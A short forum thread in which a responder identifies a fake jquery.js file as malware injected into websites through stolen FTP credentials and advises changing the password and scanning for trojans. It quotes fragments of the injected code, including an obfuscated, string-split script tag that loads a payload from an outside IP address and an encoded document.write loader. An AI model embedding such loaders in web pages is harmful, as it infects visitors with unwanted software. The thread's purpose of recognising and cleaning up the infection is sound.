seeing this fake jquery.js file...anyone else?

[cd34]

That is an exploit added to html and javascript by FTP. If you are seeing that, then the submitter's FTP account has been accessed.

There are about 4 different incarnations of it -- all resulting in the same end result. You'll also want to check any php file for code like this embedded right before the <body tag

Code:

<?php if(!function_exists('tmp_lkojfghx')){

Code:

<script language=javascript><!-- 
document.write(unescape('uyN%3CsDLc0

And the jquery.js from that site contains

Code:

<s'+'cri'+'pt src="htt'+'p://94.2'+'47.2.1'+'95/ne'+'ws/?id=10KK"><'+'/scri'+'pt>

In addition to a bit of other stuff.

news checks to see if there is a cookie, if not, it runs a toolbar installer.

Tell the submitter to change their FTP password, run a scan on their machine for spyware/trojans/viruses, then change their FTP password again if they have found anything.